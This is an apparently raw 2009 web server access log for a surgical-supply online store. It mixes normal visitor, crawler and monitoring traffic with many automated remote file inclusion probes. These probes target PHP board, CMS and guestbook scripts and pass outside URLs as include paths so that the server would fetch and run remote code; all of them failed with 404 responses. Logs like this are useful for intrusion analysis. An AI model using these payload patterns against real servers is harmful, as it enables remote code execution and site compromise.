79.174.72.67 - - [10/Jun/2009:07:31:19 -0400] "GET /logs/access_log.Q109051100/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:07:31:19 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:07:31:19 -0400] "GET /logs/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:07:31:20 -0400] "GET /logs/access_log.Q109051100/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:07:31:20 -0400] "GET /rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:07:31:20 -0400] "GET /logs/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
79.174.72.67 - - [10/Jun/2009:07:31:22 -0400] "GET /logs/access_log.Q109052800/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
172.16.1.180 - - [10/Jun/2009:07:31:23 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:31:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:31:23 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
79.174.72.67 - - [10/Jun/2009:07:31:23 -0400] "GET /logs/access_log.Q109052800/rgboard/include/mail.inc.php?skin_board_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
89.223.3.98 - - [10/Jun/2009:07:31:46 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:31:46 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:31:46 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:31:58 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:31:58 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:31:58 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:32:02 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:32:02 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:32:02 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
82.59.215.21 - - [10/Jun/2009:07:32:03 -0400] "GET /logs/error_log.Q109060500//ea-gBook/index_inc.php?inc_ordner=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
89.223.3.98 - - [10/Jun/2009:07:32:13 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:32:13 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:32:13 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:07:32:22 -0400] "GET /logs/access_log.Q109052800%20%20/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:07:32:27 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.180 - - [10/Jun/2009:07:32:28 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:32:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:32:28 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.239.76.25 - - [10/Jun/2009:07:32:28 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:07:32:28 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:07:32:28 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:32:35 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:32:50 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:07:33:21 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
89.223.3.98 - - [10/Jun/2009:07:33:28 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:07:33:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:33:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:33:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
82.59.215.21 - - [10/Jun/2009:07:33:36 -0400] "GET /logs/access_log.Q109060500//ea-gBook/index_inc.php?inc_ordner=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 248 "-" "libwww-perl/5.820"
82.59.215.21 - - [10/Jun/2009:07:33:36 -0400] "GET //ea-gBook/index_inc.php?inc_ordner=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.820"
82.59.215.21 - - [10/Jun/2009:07:33:37 -0400] "GET /logs//ea-gBook/index_inc.php?inc_ordner=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.820"
123.143.98.5 - - [10/Jun/2009:07:34:00 -0400] "GET /logs/access_log.Q109052800%20/rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
66.249.71.14 - - [10/Jun/2009:07:34:09 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1071F13220F83600F0B901Q+WSEQ(S0060):1+OUITEM(A0200):5052001 HTTP/1.1" 200 27024 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.143.98.5 - - [10/Jun/2009:07:34:18 -0400] "GET /logs/access_log.Q109052800%20/rgboard/include/mail.inc.php?skin_board_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
82.59.215.21 - - [10/Jun/2009:07:34:31 -0400] "GET /logs/error_log.Q109060500//ea-gBook/index_inc.php?inc_ordner=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.820"
172.16.1.180 - - [10/Jun/2009:07:34:35 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:34:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:34:35 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
222.239.76.25 - - [10/Jun/2009:07:35:06 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:07:35:06 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:07:35:06 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
60.251.217.4 - - [10/Jun/2009:07:35:34 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
60.251.217.4 - - [10/Jun/2009:07:35:39 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:35:43 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:35:43 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:35:43 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
60.251.217.4 - - [10/Jun/2009:07:35:48 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
60.251.217.4 - - [10/Jun/2009:07:35:54 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:35:57 -0400] "GET /logs/access_log.Q109051100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:35:57 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:07:35:57 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:07:35:57 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.proektov.ru/v5id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
85.214.56.221 - - [10/Jun/2009:07:36:16 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
174.143.3.188 - - [10/Jun/2009:07:36:27 -0400] "GET /logs/access_log.Q109052300//board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
174.143.3.188 - - [10/Jun/2009:07:36:27 -0400] "GET /logs//board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
174.143.3.188 - - [10/Jun/2009:07:36:27 -0400] "GET //board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
174.143.3.188 - - [10/Jun/2009:07:36:27 -0400] "GET /logs/access_log.Q109051700//board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
82.59.215.21 - - [10/Jun/2009:07:36:31 -0400] "GET /logs/access_log.Q108052700/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
72.36.134.234 - - [10/Jun/2009:07:36:45 -0400] "GET /logs/access_log.Q109052300//board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
72.36.134.234 - - [10/Jun/2009:07:36:45 -0400] "GET /logs//board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
72.36.134.234 - - [10/Jun/2009:07:36:46 -0400] "GET //board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.811"
72.36.134.234 - - [10/Jun/2009:07:36:47 -0400] "GET /logs/access_log.Q109051700//board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
209.59.12.99 - - [10/Jun/2009:07:37:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
71.180.7.44 - - [10/Jun/2009:07:38:21 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
71.180.7.44 - - [10/Jun/2009:07:38:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/catalogs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
80.39.67.50 - - [10/Jun/2009:07:38:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
80.39.67.50 - - [10/Jun/2009:07:38:28 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
66.232.143.238 - - [10/Jun/2009:07:39:17 -0400] "GET /logs/error_log.Q109051900/?sourcedir=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
61.250.85.200 - - [10/Jun/2009:07:40:44 -0400] "GET /logs/access_log.Q109053100//include/mail.inc.php?skin_board_path=http://www.smilewig.com/bbs///data/idade1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:07:41:56 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:41:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:07:41:56 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
218.249.36.194 - - [10/Jun/2009:07:42:32 -0400] "GET /logs/access_log.Q109052100//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:07:42:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.20.15.100 - - [10/Jun/2009:07:44:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:45:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:45:47 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
79.20.15.100 - - [10/Jun/2009:07:45:47 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
174.143.3.188 - - [10/Jun/2009:07:46:25 -0400] "GET /logs/access_log.Q109051600%20//board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt?%0D?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
72.36.134.234 - - [10/Jun/2009:07:46:26 -0400] "GET /logs/access_log.Q109051600%20//board/skin/zero_vote/ask_password.php?dir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
209.59.12.99 - - [10/Jun/2009:07:47:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.61.119.142 - - [10/Jun/2009:07:47:59 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/home_flash.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:00 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:00 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:00 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:00 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:01 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
70.61.119.142 - - [10/Jun/2009:07:48:03 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NovaPacs Viewer 6.5.223.3; GTB6; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"
